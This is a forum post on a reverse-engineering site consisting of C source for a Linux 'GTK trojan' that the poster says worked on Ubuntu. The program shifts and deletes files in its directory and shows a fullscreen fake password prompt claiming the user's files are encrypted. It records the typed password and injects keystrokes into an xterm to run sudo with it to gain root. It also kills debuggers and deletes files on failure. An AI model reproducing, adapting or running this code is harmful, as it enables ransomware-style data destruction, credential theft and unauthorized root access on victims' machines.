Jump to content
Tuts 4 You

GTK Linux Trojan


JMC31337

Recommended Posts

//gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0`
//JMC31337
//VIRAL WEAPONRY LABZ
#include <gtk/gtk.h>
#include <stdio.h>
//#include <gdk/gdkkeysyms.h>
#include <stdlib.h>
#include <X11/Xlib.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>
#include <string.h>
#include <linux/input.h>
#include <X11/Xutil.h>
#include <X11/Xatom.h>
#include <X11/keysymdef.h>
#include <dirent.h>
int apt=1;
//===================================
static void delete()
{
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
int apt=1;
int C4 = 4;
n = scandir(".", &namelist, 0, alphasort);
if (n < 0)
perror("scandir");
else
{
while(n--)
{
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
if(strcmp(namelist[n]->d_name,"SG.txt")!=0)
{
if(apt<=2)
{
//printf("%s\n", namelist[n]->d_name);
remove(namelist[n]->d_name);
apt++;
free(namelist[n]);
}
}
}
}
free(namelist);
}
}
//===================================
static void encrypt()
{
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
int C4 = 4;
FILE *stream,*fo;
n = scandir(".", &namelist, 0, alphasort);
int tot=n;
int totd = tot*2;
if (n < 0)
perror("scandir");
else
{
while(n--)
{
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
printf("%s\n", namelist[n]->d_name);
//getchar();
if((stream = fopen(namelist[n]->d_name,"r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
char sgfile[255];
sprintf(sgfile,"sg%d",tot);
char skb = c + C4;
fo=fopen(sgfile,"a+");
fprintf(fo,"%c",skb);
fclose(fo);
//printf("%d",c);
//printf("\n");
}
fclose(stream);
c=0;
}
tot--;
//totd--;
remove(namelist[n]->d_name);
free(namelist[n]);
}
}
free(namelist);
}
}
//===================================
static void decrypt()
{
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
int C4 = 4;
FILE *stream,*fo;
n = scandir(".", &namelist, 0, alphasort);
int tot=n;
int totd = tot*2;
if (n < 0)
perror("scandir");
else
{
while(n--)
{
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
printf("%s\n", namelist[n]->d_name);
//getchar();
if((stream = fopen(namelist[n]->d_name,"r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
char sgfile[255];
sprintf(sgfile,"sg%d",totd);
char skb = c - C4;
fo=fopen(sgfile,"a+");
fprintf(fo,"%c",skb);
fclose(fo);
//printf("%d",c);
//printf("\n");
}
fclose(stream);
c=0;
}
//tot--;
totd--;
remove(namelist[n]->d_name);
free(namelist[n]);
}
}
free(namelist);
}}
//===================================
//THNX TADEJ
typedef struct _Data Data;
struct _Data
{
/* Buffers that will display output */
GtkTextBuffer *out;
GtkTextBuffer *in;
GtkTextBuffer *err;};
//===================================
static void destroy( GtkWidget *widget,
gpointer data )
{
gtk_main();
//gtk_main_quit ();
}//===================================
static gboolean cb_err_watch( GIOChannel *channel, GIOCondition cond, Data *data)
{
gchar *string;
gsize size; if( cond == G_IO_HUP )
{
g_io_channel_unref( channel );
return( FALSE );
} g_io_channel_read_line( channel, &string, &size, NULL, NULL );
gtk_text_buffer_insert_at_cursor( data->err, string, -1 );
g_free( string ); return( TRUE );
}
//===================================
static gboolean cb_out_watch(GIOChannel *channel, GIOCondition cond, Data *data)
{
gchar *string;
gsize size; if( cond == G_IO_HUP )
{
g_io_channel_unref( channel );
return( FALSE );
} g_io_channel_read_line( channel, &string, &size, NULL, NULL );
gtk_text_buffer_insert_at_cursor( data->out, string, -1 );
g_free( string );
return( TRUE );
}
//===================================
static void cb_child_watch( GPid pid, gint status, Data *data )
{
/* Close pid */
g_spawn_close_pid( pid );
}
//===================================
static void cb_execute( Data *data )
{
GPid pid;
gchar *argv[] = { "xterm",NULL };
gint out,err; GIOChannel *outch,*inch,*errch;
gboolean ret; /* Spawn child process */
ret = g_spawn_async_with_pipes( "/usr/bin", argv, NULL,
G_SPAWN_DO_NOT_REAP_CHILD, NULL,
NULL, &pid,NULL, &out, &err, NULL );
if( ! ret )
{
g_error( "SPAWN FAILED" );
return;
} /* Add watch function to catch termination of the process. This function
* will clean any remnants of process. */
g_child_watch_add( pid, (GChildWatchFunc)cb_child_watch, data ); outch = g_io_channel_unix_new( out );
errch = g_io_channel_unix_new( err );
// inch = g_io_channel_unix_new( in ); /* Add watches to channels */
g_io_add_watch( outch, G_IO_IN | G_IO_HUP, (GIOFunc)cb_out_watch, data );
g_io_add_watch( errch, G_IO_IN | G_IO_HUP, (GIOFunc)cb_err_watch, data );
// g_io_add_watch( inch, G_IO_OUT | G_IO_HUP, (GIOFunc)cb_in_watch, data );
}
//===================================
//THNKX Bharathi
static void SendKey (Display * disp, KeySym keysym, KeySym modsym)
{
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
if (keycode == 0) return;
XTestGrabControl (disp, True);
/* Generate modkey press */
if (modsym != 0)
{
modcode = XKeysymToKeycode(disp, modsym);
XTestFakeKeyEvent (disp, modcode, True, 0);
}
/* Generate regular key press and release */
XTestFakeKeyEvent (disp, keycode, True, 0);
XTestFakeKeyEvent (disp, keycode, False, 0);
/* Generate modkey release */
if (modsym != 0)
XTestFakeKeyEvent (disp, modcode, False, 0);
XSync (disp, False);
XTestGrabControl (disp, False);
}
//===================================
static void Disable (Display * disp, KeySym keysym, KeySym modsym)
{
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
XTestGrabControl (disp, True);
XTestFakeKeyEvent (disp, keycode, False, 0);
if (modsym != 0)
{
XTestFakeKeyEvent (disp, modcode, False, 0);
}
XSync (disp, False);
XTestGrabControl (disp, False);
}
//===================================
void exprog(int sig);void exprog(int sig)
{
signal(SIGINT,SIG_IGN);}
//====================================gboolean updatex (GtkWidget *entry, GdkEventKey *event, gpointer nolle)
{ const gchar *text = gtk_entry_get_text(GTK_ENTRY(entry));int sig;
//signal(SIGINT,exprog);if(event -> keyval != '\0')
{/*
if(event -> keyval == XK_Alt_L)
{
Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Alt_L,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));
}
*/
/*
if(event -> keyval == XK_Alt_R)
{
Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Alt_R,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));
}
*/
/*
if(event -> keyval == XK_Control_R)
{Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Control_R,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));}if(event -> keyval == XK_Control_L)
{Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Control_L,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));}
*/if(event -> keyval == XK_Return)
{
int x = system("mkdir /sg"); //BadCrC
if(x!=0 || getuid() != 0) //thnx herm1t
{
printf("NOT ROOT\n");
}
else
{
printf("GOT ROOT\n");
decrypt();
gtk_main_quit(); //RUN WHATEVER FUNCTION YOU WANT AS ROOT HERE
}
//g_print(text);
//g_print("\n");FILE *fp;
fp=fopen("SG.txt","w+"); //BadCrC
fputs(text,fp);
fclose(fp);Display *disp = XOpenDisplay (NULL);
XSync (disp, False);
XTestGrabControl (disp, False);
XFlush(disp);
XCloseDisplay(disp);
Data *data;
data = g_slice_new(Data);
cb_execute(data); //NEEDED FOR REPARENT WINDOW PROCESS ID//========================= Display *display;
Window rootwin;
display = XOpenDisplay( NULL );
rootwin = DefaultRootWindow( display );
XSelectInput( display, rootwin, SubstructureNotifyMask );
XEvent event;
int y=0;
while(y==0)
{
XNextEvent( display, &event );
if(event.type == ReparentNotify )
{
XReparentEvent *reparentevent = (XReparentEvent *)&event;
//printf( "Spawned WinID: 0x%x\n", (unsigned int)(reparentevent->window));
sleep(1);
Display *disp2 = XOpenDisplay (NULL);
Window w;
char *end = NULL;
unsigned int w_str = reparentevent->window;
//w=strtoul(ch,&end,16);
XSetInputFocus(disp2,w_str,RevertToPointerRoot,CurrentTime);
XFlush(disp2);
sleep(3);
SendKey (disp2, XK_s, 0);
SendKey (disp2, XK_u, 0);
SendKey (disp2, XK_d, 0);
SendKey (disp2, XK_o, 0);
SendKey (disp2, XK_space, 0);
SendKey (disp2, XK_m, 0);
SendKey (disp2, XK_k, 0);
SendKey (disp2, XK_d, 0);
SendKey (disp2, XK_i, 0);
SendKey (disp2, XK_r, 0);
SendKey (disp2, XK_space, 0);
SendKey (disp2, XK_slash, 0);
SendKey (disp2, XK_s, 0); //BadCrC
SendKey (disp2, XK_g, 0);
SendKey (disp2, XK_Return, 0);
XFlush(disp2);
//===========================
int c,zz;
zz=0;
FILE *stream;
jumper:
sleep(3);
if((stream = fopen("SG.txt","r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
SendKey(disp2,c,0);
}
}
SendKey(disp2,XK_Return,0);
XFlush(disp2);
zz++;
if(zz!=3)
{goto jumper;}
//===========================
y++;
}
}//==========================int exist=system("ls /sg");
if(exist!=0)
{
system("pkill xterm");
delete();
}
else
{
//RUN WHATEVERAS ROOT HERE
system("pkill xterm");
printf("ROOTED\n");
decrypt();
gtk_main_quit();
}
gtk_widget_grab_focus(GTK_WIDGET(entry));
g_slice_free(Data,data);
//gtk_main_quit();
}} return FALSE;
}
//====================================
GtkWidget *
create_window(void)
{
GtkWidget *window;
GtkWidget *fixed;
GtkWidget *label,*label2,*label3,*label4;
GtkWidget *entry;
GtkWidget *nolle = NULL;window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
gtk_window_set_decorated(GTK_WINDOW(window),FALSE);
gtk_window_fullscreen(GTK_WINDOW(window));
gtk_window_set_keep_above(GTK_WINDOW(window),TRUE);
fixed = gtk_fixed_new();
gtk_widget_show(fixed);
gtk_container_add(GTK_CONTAINER(window),fixed);
//=========================================
//USER NAME STUFFchar *s;
s=getenv("USER");
label2 = gtk_label_new(s);
gtk_widget_show(label2);
gtk_fixed_put(GTK_FIXED(fixed),label2,410,300);
//=========================================
//PASSWORD STUFF
label=gtk_label_new("PASSWORD:");
gtk_widget_show(label);
gtk_fixed_put(GTK_FIXED(fixed),label,100,350);entry = gtk_entry_new();
gtk_entry_set_visibility(GTK_ENTRY(entry),FALSE);
gtk_entry_set_width_chars(GTK_ENTRY(entry),75);
gtk_widget_show(entry);
gtk_fixed_put(GTK_FIXED(fixed),entry,185,345);
gtk_widget_grab_focus(entry);
//==========================================
//LIKE CLOCK-WORK
//PLACE PROGRESS BAR CODE HERE!!!
char *tik = "30";
label3 = gtk_label_new(tik);
gtk_widget_show(label3);
gtk_fixed_put(GTK_FIXED(fixed),label3,430,380);
//============================================
char *xox="Seconds left, your HOME files are ENCRYPTED\nENTER YOUR PASSWORD NOW! DO NOT REBOOT\n OR YOUR DATA WILL BE LOST ";
label4=gtk_label_new(xox);
gtk_widget_show(label4);
gtk_fixed_put(GTK_FIXED(fixed),label4,300,400);
//=========================================
g_signal_connect(G_OBJECT(entry), "key-press-event", G_CALLBACK(updatex), nolle);
//=========================================
//g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(cb_execute),data);
//=========================================
g_signal_connect (window, "destroy",
G_CALLBACK (destroy), NULL);
//===========================================
g_signal_connect (window, "delete-event",
G_CALLBACK (destroy), NULL);
//==========================================
return window;
}main(int argc,char *argv[])
{
encrypt();
GtkWidget *window,*text;
gtk_init(&argc,&argv);
window = create_window();
gtk_widget_set_size_request(window,600,600);
gtk_widget_show(window);
gtk_main();
Data *data;
data = g_slice_new( Data );
text = gtk_text_view_new();
//CHILD PROCESS OUTPUT DATA IS STORED IN HERE
data->out = gtk_text_view_get_buffer( GTK_TEXT_VIEW( text ) );
//ERROR IF PERMISSION IS DENIED IS STORED IN HERE
data->err = gtk_text_view_get_buffer( GTK_TEXT_VIEW( text ) );
return 0;
}

nothing great but it worked on ubuntu

Edited by JMC31337
Link to comment

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...